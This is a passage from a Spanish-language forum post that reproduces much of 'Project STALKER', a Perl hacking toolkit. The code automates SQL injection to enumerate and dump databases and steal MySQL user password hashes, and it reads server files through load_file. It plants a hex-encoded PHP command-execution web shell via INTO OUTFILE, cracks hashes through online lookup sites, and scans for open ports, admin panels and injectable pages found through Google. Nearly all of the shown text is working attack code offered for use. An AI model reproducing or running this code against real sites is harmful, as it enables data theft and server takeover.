  552. $real++;
  553. }}
  554. print "\n";
  555. } else {
  556. print "\n[-] information_schema = ERROR\n";
  557. }}
  558.  
  559. sub schemadb {
  560. my ($page,$bypass,$save) = @_;
  561. my $page1 = $page;
  562. savefile($save.".txt","\n");
  563. print "\n\n[+] Searching DBS\n\n";
  564. ($pass1,$pass2) = &bypass($bypass);
  565. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  566. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  567. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  568. my $limita = $1;
  569. print "[+] Databases Length : $limita\n\n";
  570. savefile($save.".txt","[+] Databases Length : $limita\n");
  571. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  572. $real = "1";
  573. for my $limit(0..$limita) {
  574. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  575. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  576. my $control = $1;
  577. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  578. print "[Database $real Found] $control\n";
  579. savefile($save.".txt","[Database $real Found] : $control");
  580. $real++;
  581. }
  582. }
  583. }
  584. print "\n";
  585. } else {
  586. print "[-] information_schema = ERROR\n";
  587. }
  588. }
  589.  
  590. sub schematablesdb {
  591. my $page = $_[0];
  592. my $db = $_[2];
  593. my $page1 = $page;
  594. savefile($_[3].".txt","\n");
  595. print "\n\n[+] Searching tables with DB $db\n\n";
  596. ($pass1,$pass2) = &bypass($_[1]);
  597. savefile($_[3].".txt","[DB] : $db");
  598. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  599. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  600. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  601. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  602. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  603. print "[+] Tables Length :  $1\n\n";
  604. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  605. my $limit = $1;
  606. $real = "1";
  607. for my $lim(0..$limit) {
  608. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  609. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  610. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  611. my $table = $1;
  612. chomp $table;
  613. savefile($_[3].".txt","[Table $real Found : $table ]");
  614. print "[Table $real Found : $table ]\n";
  615. $real++;
  616. }}
  617. print "\n";
  618. } else {
  619. print "\n[-] information_schema = ERROR\n";
  620. }}
  621.  
  622. sub schemacolumnsdb {
  623. my ($page,$bypass,$db,$table,$save) = @_;
  624. my $page3 = $page;
  625. my $page4 = $page;
  626. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  627. savefile($save.".txt","\n");
  628. ($pass1,$pass2) = &bypass($_[1]);
  629. savefile($save.".txt","\n[DB] : $db");
  630. savefile($save.".txt","[Table] : $table");
  631. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  632. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  633. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  634. print "\n[Columns length : $1 ]\n\n";
  635. savefile($save.".txt","[Columns length : $1 ]\n");
  636. my $si = $1;
  637. chomp $si;
  638. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  639. $real = "1";
  640. for my $limit2(0..$si) {
  641. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  642. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  643. print "[Column $real] : $1\n";
  644. savefile($save.".txt","[Column $real] : $1");
  645. $real++;
  646. }
  647. }
  648. } else {
  649. print "\n[-] information_schema = ERROR\n";
  650. }
  651. print "\n";
  652. }
  653.  
  654. sub mysqluser {
  655. my ($page,$bypass,$save) = @_;
  656. my $cop = $page;
  657. my $cop1 = $page;
  658. savefile($save.".txt","\n");
  659. print "\n\n[+] Finding mysql.users\n";
  660. ($pass1,$pass2) = &bypass($bypass);
  661. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  662. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  663. if ($code=~/RATSXPDOWN/ig){
  664. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  665. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  666. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  667. print "\n[+] Users Found : $1\n\n";
  668. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  669. for my $limit(0..$1) {
  670. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  671. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  672. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  673. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  674. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  675. } else {
  676. print "\n";
  677. &reload;
  678. }
  679. }
  680. }
  681. } else {
  682. print "\n[-] mysql.user = ERROR\n\n";
  683. }
  684. }
  685.  
  686. sub dump {
  687. savefile($_[5].".txt","\n");
  688. my $page = $_[0];
  689. ($pass1,$pass2) = &bypass($_[4]);
  690. if ($page=~/(.*)hackman(.*)/){
  691. my $start = $1;
  692. my $end = $2;
  693. print "\n\n[+] Extracting values...\n\n";
  694. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  695. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  696. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  697. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  698. $tota = $1;
  699. print "[+] Table : $_[3]\n";
  700. print "[+] Length of the rows : $tota\n\n";
  701. print "[$_[1]] [$_[2]]\n\n";
  702. savefile($_[5].".txt","[Table] : $_[3]");
  703. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  704. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  705. for my $limit(0..$tota) {
  706. chomp $limit;
  707. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  708. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  709. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  710. print "[$_[1]] : $1   [$_[2]] : $2\n";
  711. } else {
  712. print "\n\n[+] Extracting Finish\n\n";
  713. last;
  714. &reload;
  715. }
  716. }
  717. } else {
  718. print "[-] Not Found any DATA\n\n";
  719. }}}
  720.  
  721.  
  722. sub loadfile {
  723. savefile($_[2].".txt","\n");
  724. ($pass1,$pass2) = &bypass($_[1]);
  725. if ($_[0] =~/(.*)hackman(.*)/g) {
  726. my $start = $1; my $end = $2;
  727. print "\n\n[+] File to read : ";
  728. chomp (my $file = <stdin>);
  729. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
  730. my $code = toma($start.$concat.$end.$pass2);
  731. chomp $code;
  732. if ($code=~/k0bra(.*)k0bra/s) {
  733. print "[File Found] : $file\n";
  734. print "\n[Source Start]\n\n";
  735. print $1;
  736. print "\n\n[Source End]\n\n";
  737. savefile($_[2].".txt","[File Found] : $file");
  738. savefile($_[2].".txt","\n[Source Start]\n");
  739. savefile($_[2].".txt","$1");
  740. savefile($_[2].".txt","\n[Source End]\n");
  741. }}
  742. &reload;
  743. }
  744.  
  745.  
  746. sub into {
  747. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  748. my ($page,$bypass,$dir,$save) = @_;
  749. savefile($save.".txt","\n");
  750. print "\n";
  751. ($pass1,$pass2) = &bypass($bypass);
  752. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  753. if ($path=~/\/(.*)$/) {
  754. my $path1 = $1;
  755. my $path2 = $path1;
  756. $path2 =~s/$1//;
  757. $dir =~s/$path1//ig;
  758. $shell = $dir."/"."shell.php";
  759. if ($page =~/(.*)hackman(.*)/ig) {
  760. my  ($start,$end) = ($1,$2);
  761. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
  762. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
  763. if ($code1=~/Mini Shell By Doddy/ig) {
  764. print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a";
  765. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
  766. } else {
  767. print "[shell] : Not Found\n";
  768. }
  769. }
  770. }
  771. print "\n\n";
  772. &reload;
  773. }
  774.  
  775.  
  776. sub bypass {
  777. if ($_[0] eq "/*") { return ("/**/","/*"); }
  778. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  779. else {return ("+","--");}}
  780.  
  781. sub ascii {
  782. return join ',',unpack "U*",$_[0];
  783. }
  784.  
  785. sub base {
  786. $re = encode_base64($_[0]);
  787. chomp $re;
  788. return $re;
  789. }
  790.  
  791. sub base_de {
  792. $re = decode_base64($_[0]);
  793. chomp $re;
  794. return $re;
  795. }
  796.  
  797.  
  798. sub download {
  799. if ($nave->mirror($_[0],$_[1])) {
  800. if (-f $_[1]) {
  801. return true;
  802. }}}
  803.  
  804.  
  805. sub hex_en {
  806. my $string = $_[0];
  807. $hex = '0x';
  808. for (split //,$string) {
  809. $hex .= sprintf "%x", ord;
  810. }
  811. return $hex;
  812. }
  813.  
  814. sub hex_de {
  815. my $text = shift;
  816. $text =~ s/^0x//;
  817. $encode = join q[], map { chr hex } $text =~ /../g;
  818. return $encode;
  819. }
  820.  
  821. sub ascii_de {
  822. my $text = shift;
  823. $text = join q[], map { chr } split q[,],$text;
  824. return $text;
  825. }
  826.  
  827. sub getprocess {
  828.  
  829. my %procesos;
  830.  
  831. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  832. my $dos = $uno->ConnectServer("","root\\cimv2");
  833.  
  834. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
  835. $procesos{$pro->{Caption}} = $pro->{ProcessId};
  836. }
  837. return %procesos;
  838. }
  839.  
  840. sub killprocess {
  841.  
  842. my ($numb,$pid) = @_;
  843.  
  844. if (Win32::Process::KillProcess($pid,$numb)) {
  845. return true;
  846. } else {
  847. return false;
  848. }
  849. }
  850.  
  851. sub getip {
  852. my $get = gethostbyname($_[0]);
  853. return inet_ntoa($get);
  854. }
  855.  
  856. sub crackit {
  857.  
  858. my $secret = $_[0];
  859.  
  860. print "[+] Cracking $_[0]\n\n";
  861.  
  862. my %hash = (
  863.  
  864. 'http://passcracking.com/' => {
  865. 'tipo'  => 'post',
  866. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
  867. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  868. },  
  869. 'http://md5.hashcracking.com/search.php?md5=' =>  {
  870. 'tipo' => 'get',
  871. 'regex' => 'Cleartext of $_[0] is (.*)',
  872. },
  873. 'http://www.bigtrapeze.com/md5/' =>  {
  874. 'tipo' => 'post',
  875. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
  876. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  877. },
  878. 'http://opencrack.hashkiller.com/' =>  {
  879. 'tipo' => 'post',
  880. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  881. 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
  882. },
  883. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
  884. 'tipo' => 'post',
  885. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
  886. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  887. },
  888. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
  889. 'tipo' => 'get',
  890. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  891. }
  892. );
  893.  
  894. for my $data(keys %hash) {
  895.  
  896. if ($hash{$data}{tipo} eq "get") {
  897. $code = toma($data.$_[0]);
  898. if ($code=~/$hash{$data}{regex}/ig) {
  899. print "\n[+] Decoded : ".$1."\n\n";
  900. saveyes("logs/pass-found.txt",$secret.":".$1);
  901. }
  902. } else {
  903. $code = tomar($data,$hash{$data}{variables});
  904. if ($code=~/$hash{$data}{regex}/ig) {
  905. saveyes("logs/pass-found.txt",$secret.":".$1);
  906. }
  907. }
  908. }
  909. print "\n[+] Finish\n";
  910. }
  911.  
  912. sub ftp {
  913.  
  914. my ($ftp,$user,$pass) = @_;
  915.  
  916. if (my $socket = Net::FTP->new($ftp)) {
  917. if ($socket->login($user,$pass)) {
  918.  
  919. print "\n[+] Enter of the server FTP\n\n";
  920.  
  921. menu:
  922.  
  923. print "\n\nftp>";
  924. chomp (my $cmd = <stdin>);
  925. print "\n\n";
  926.  
  927. if ($cmd=~/help/) {
  928. print q(
  929.  
  930. help : show information
  931. cd : change directory <dir>
  932. dir : list a directory
  933. mdkdir : create a directory <dir>
  934. rmdir : delete a directory <dir>
  935. pwd : directory  
  936. del : delete a file <file>
  937. rename : change name of the a file <file1> <file2>
  938. size : size of the a file <file>
  939. put : upload a file <file>
  940. get : download a file <file>
  941. cdup : change dir <dir>
  942. exit : ??
  943.  
  944.  
  945. );
  946. }
  947.  
  948. if ($cmd=~/dir/ig) {
  949. if (my @files = $socket->dir()) {
  950. for(@files) {
  951. print "[+] ".$_."\n";
  952. }
  953. } else {
  954. print "\n\n[-] Error\n\n";
  955. }
  956. }
  957.  
  958. if ($cmd=~/pwd/ig) {
  959. print "[+] Path : ".$socket->pwd()."\n";
  960. }
  961.  
  962. if ($cmd=~/cd (.*)/ig) {
  963. if ($socket->cwd($1)) {
  964. print "[+] Directory changed\n";
  965. } else {
  966. print "\n\n[-] Error\n\n";
  967. }
  968. }
  969.  
  970. if ($cmd=~/cdup/ig) {
  971. if (my $dir = $socket->cdup()) {
  972. print "\n\n[+] Directory changed\n\n";
  973. } else {
  974. print "\n\n[-] Error\n\n";
  975. }
  976. }
  977.  
  978. if ($cmd=~/del (.*)/ig) {
  979. if ($socket->delete($1)) {
  980. print "[+] File deleted\n";
  981. } else {
  982. print "\n\n[-] Error\n\n";
  983. }
  984. }
  985.  
  986. if ($cmd=~/rename (.*) (.*)/ig) {
  987. if ($socket->rename($1,$2)) {
  988. print "[+] File Updated\n";
  989. } else {
  990. print "\n\n[-] Error\n\n";
  991. }
  992. }
  993.  
  994. if ($cmd=~/mkdir (.*)/ig) {
  995. if ($socket->mkdir($1)) {
  996. print "\n\n[+] Directory created\n";
  997. } else {
  998. print "\n\n[-] Error\n\n";
  999. }
  1000. }
  1001.  
  1002. if ($cmd=~/rmdir (.*)/ig) {
  1003. if ($socket->rmdir($1)) {
  1004. print "\n\n[+] Directory deleted\n";
  1005. } else {
  1006. print "\n\n[-] Error\n\n";
  1007. }
  1008. }
  1009.  
  1010. if ($cmd=~/exit/ig) {
  1011. next;
  1012. }
  1013.  
  1014. if ($cmd=~/get (.*) (.*)/ig) {
  1015. print "\n\n[+] Downloading file\n\n";
  1016. if ($socket->get($1,$2)) {
  1017. print "[+] Download completed";
  1018. } else {
  1019. print "\n\n[-] Error\n\n";
  1020. }
  1021. }
  1022.  
  1023. if ($cmd=~/put (.*) (.*)/ig) {
  1024. print "\n\n[+] Uploading file\n\n";
  1025. if ($socket->put($1,$2)) {
  1026. print "[+] Upload completed";
  1027. } else {
  1028. print "\n\n[-] Error\n\n";
  1029. }
  1030. }
  1031.  
  1032. if ($cmd=~/quit/) {
  1033. next;
  1034. }
  1035.  
  1036. goto menu;
  1037.  
  1038. } else {
  1039. print "\n[-] Failed the login\n\n";
  1040. }
  1041.  
  1042. } else {
  1043. print "\n\n[-] Error\n\n";
  1044. }
  1045.  
  1046.  
  1047.  
  1048. }
  1049.  
  1050.  
  1051. sub scanpaths {
  1052.  
  1053. my $urla = $_[0];
  1054.  
  1055. print "\n[+] Find paths in $urla\n\n\n";
  1056. my @urls = repes(get_links(toma($urla)));
  1057. for $url(@urls) {
  1058. my $web = $url;
  1059. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
  1060. if ($_[0] =~/$auth/ or $auth eq "") {
  1061. if ($path=~/(.*)\/(.*)\.(.*)$/) {
  1062. my $borrar = $2.".".$3;
  1063. if ($web=~/(.*)$borrar/) {
  1064. my $co = $1;
  1065. unless ($co=~/$auth/) {
  1066. $co = $urla.$co;
  1067. }
  1068. $code = toma($co);
  1069. if ($code=~/Index Of/ig) {
  1070. print "[Link] : ".$co."\n";
  1071. saveyes("logs/paths-found.txt",$co);
  1072. }}}}}}
  1073.  
  1074.  
  1075. sub scanport {
  1076.  
  1077. my %ports = ("21"=>"ftp",
  1078. "22"=>"ssh",
  1079. "25"=>"smtp",
  1080. "80"=>"http",
  1081. "110"=>"pop3",
  1082. "3306"=>"mysql"
  1083. );
  1084.  
  1085.  
  1086. print "[+] Scanning $_[0]\n\n\n";
  1087.  
  1088. for my $port(keys %ports) {
  1089.  
  1090. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
  1091. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
  1092. }
  1093. }
  1094. print "\n\n[+] Finish\n";
  1095. }
  1096.  
  1097.  
  1098. sub scanpanel {
  1099. print "[+] Scanning $_[0]\n\n\n";
  1100. for $path(@panels) {
  1101. $code = tomax($_[0]."/".$path);
  1102. if ($code->is_success) {
  1103. print "[Link] : ".$_[0]."/".$path."\n";
  1104. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
  1105. }
  1106. }
  1107. print "\n\n[+] Finish\n";
  1108. }
  1109.  
  1110. sub google {
  1111. my($a,$b) = @_;
  1112. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  1113. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
  1114. my @links = get_links($code);
  1115. for my $l(@links) {
  1116. if ($l =~/webcache.googleusercontent.com/) {
  1117. push(@url,$l);
  1118. }
  1119. }
  1120. }
  1121.  
  1122. for(@url) {
  1123. if ($_ =~/cache:(.*?):(.*?)\+/) {
  1124. push(@founds,$2);
  1125. }
  1126. }
  1127.  
  1128. my @founds = repes(@founds);
  1129.  
  1130. return @founds;
  1131. }
  1132.  
  1133.  
  1134. sub sql {
  1135.  
  1136. my ($pass1,$pass2) = ("+","--");
  1137. my $page = shift;
  1138. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  1139. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  1140. print "[+] SQLI : $page\a\n";
  1141. saveyes("logs/sql-logs.txt",$page);
  1142. }}
  1143.  
  1144. sub get_links {
  1145.  
  1146. $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  1147. return @links;
  1148.  
  1149. sub agarrar {
  1150. my ($a,%b) = @_;
  1151. push(@links,values %b);
  1152. }
  1153. }
  1154.  
  1155. sub repes {
  1156. foreach $test(@_) {
  1157. push @limpio,$test unless $repe{$test}++;
  1158. }
  1159. return @limpio;
  1160. }
  1161.  
  1162. sub head {
  1163. cprint "\x0311"; #13
  1164. print "\n\n-- == Project STALKER == --\n\n";
  1165. cprint "\x030";
  1166. }
  1167.  
  1168. sub copyright {
  1169. cprint "\x0311"; #13
  1170. print"\n\n(C) Doddy Hackman 2011\n\n";
  1171. cprint "\x030";
  1172. }
  1173.  
  1174. sub toma {
  1175. return $nave->get($_[0])->content;
  1176. }
  1177.  
  1178. sub tomax {
  1179. return $nave->get($_[0]);
  1180. }
  1181.  
  1182. sub tomar {
  1183. my ($web,$var) = @_;
  1184. return $nave->post($web,[%{$var}])->content;
  1185. }
  1186.  
  1187.  
  1188. sub conectar {
  1189.  
  1190. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
  1191. Proto => "tcp",Timeout  => 5);
  1192.  
  1193. print $sockex $_[2]."\r\n";
  1194. $sockex->read($re,5000);
  1195. $sockex->close;
  1196. return $re."\r\n";
  1197. }
  1198.  
  1199.  
  1200. sub enter {
  1201.  
  1202. my ($host,$user,$pass) = @_;
  1203.  
  1204. print "[+] Connecting to the server\n";
  1205.  
  1206. $info = "dbi:mysql::".$host.":3306";
  1207. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
  1208.  
  1209. print "\n[+] Enter in the database";
  1210.  
  1211. while(1) {
  1212. print "\n\n\n[+] Query : ";
  1213. chomp(my $ac = <stdin>);
  1214.  
  1215. if ($ac eq "exit") {
  1216. $enter->disconnect;
  1217. print "\n\n[+] Closing connection\n\n";
  1218. last;
  1219. }
  1220.  
  1221. $re = $enter->prepare($ac);
  1222. $re->execute();
  1223. my $total = $re->rows();
  1224.  
  1225. my @columnas = @{$re->{NAME}};
  1226.  
  1227. if ($total eq "-1") {
  1228. print "\n\n[-] Query Error\n";
  1229. next;
  1230. } else {
  1231. print "\n\n[+] Result of the query\n";
  1232. if ($total eq 0) {
  1233. print "\n\n[+] Not rows returned\n\n";
  1234. } else {
  1235. print "\n\n[+] Rows returned : ".$total."\n\n\n";
  1236. for(@columnas) {
  1237. print $_."\t\t";
  1238. }
  1239. print "\n\n";
  1240. while (@row = $re->fetchrow_array) {
  1241. for(@row) {
  1242. print $_."\t\t";
  1243. }
  1244. print "\n";
  1245. }}}}
  1246. } else {
  1247. print "\n[-] Error connecting\n";
  1248. }}
  1249.  
  1250. sub encode {
  1251. my $string = $_[0];
  1252. $hex = '0x';
  1253. for (split //,$string) {
  1254. $hex .= sprintf "%x", ord;
  1255. }
  1256. return $hex;
  1257. }
  1258.  
  1259. sub saveyes {
  1260. open (SAVE,">>".$_[0]);
  1261. print SAVE $_[1]."\n";
  1262. close SAVE;
  1263. }
  1264.  
  1265. sub savefile {
  1266. open (SAVE,">>logs/webs/".$_[0]);
  1267. print SAVE $_[1]."\n";
  1268. close SAVE;
  1269. }
  1270.  
  1271. sub coleccionar {
  1272. opendir DIR,$_[0];
  1273. my @archivos = readdir DIR;
  1274. close DIR;
  1275. return @archivos;
  1276. }
  1277.  
  1278. sub helpme {
  1279.  
  1280. cprint "\x0310"; #13
  1281. print qq(
  1282.  
  1283. Commands :
  1284.  
  1285.  
  1286. getip <host>
  1287. getlink <page>
  1288. getprocess
  1289. killprocess <name process> <pid process>
  1290. conec <host> <port> <command>  
  1291. allow <host>
  1292. paths <page>
  1293. encodehex <text>
  1294. decodehex <text>
  1295. encodeascii <text>
  1296. decodeascii <text>
  1297. encodebase <text>
  1298. decodebase <text>
  1299. scanport <host>
  1300. panel <page>
  1301. getpass <hash>
  1302. kobra <page>
  1303. ftp <host> <user> <pass>
  1304. mysql <host> <user> <pass>
  1305. navegator
  1306. scangoogle
  1307. help
  1308. exit
  1309. );
  1310. cprint "\x030";
  1311. }
  1312.  
  1313. #
  1314. #  The End ?
  1315. #
  1316.  


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] Stalker By Doddy H
Scripting
BigBear 2 2,575 Último mensaje 19 Octubre 2011, 22:47 pm
por BigBear
[Perl] Project STALKER 0.7
Scripting
BigBear 0 1,258 Último mensaje 19 Enero 2012, 20:36 pm
por BigBear
[Perl Tk] Project Arsenal X
Scripting
BigBear 0 1,346 Último mensaje 21 Julio 2012, 17:23 pm
por BigBear
[Perl] Project ParanoicScan 1.0
Scripting
BigBear 0 1,190 Último mensaje 4 Agosto 2012, 16:02 pm
por BigBear
[Perl] Project STALKER 1.0
Scripting
BigBear 0 1,144 Último mensaje 25 Agosto 2012, 16:55 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines